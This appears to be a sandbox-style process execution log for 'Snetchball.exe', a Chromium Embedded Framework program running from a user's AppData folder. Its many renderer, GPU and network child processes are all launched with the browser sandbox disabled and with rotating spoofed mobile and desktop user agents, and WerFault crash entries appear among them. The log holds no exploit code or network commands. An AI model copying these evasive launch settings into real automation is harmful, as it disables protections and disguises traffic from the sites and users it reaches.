"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/132.1 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4088 --field-trial-handle=2876,i,10251981098093072248,15539746029629878164,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2772 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3048 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3052 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPod touch; CPU iPhone 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4224 --field-trial-handle=2776,i,14585129340942571174,734030952720539259,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1328
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2404 -ip 2404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1084
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2864 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3128 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3132 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3220 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3212 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4276 --field-trial-handle=2868,i,3594501698199662465,326217099506081094,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2872 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3120 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.31 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4316 --field-trial-handle=2876,i,7935047675213316990,9643591105990702053,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2896 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2932 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2928 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3172 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 (Edition ms_store)" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4004 --field-trial-handle=2900,i,2027336799912259807,9000405061759148432,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/131.0.6778.73 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2796 --field-trial-handle=2800,i,14605686281421155070,16106718444034165426,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
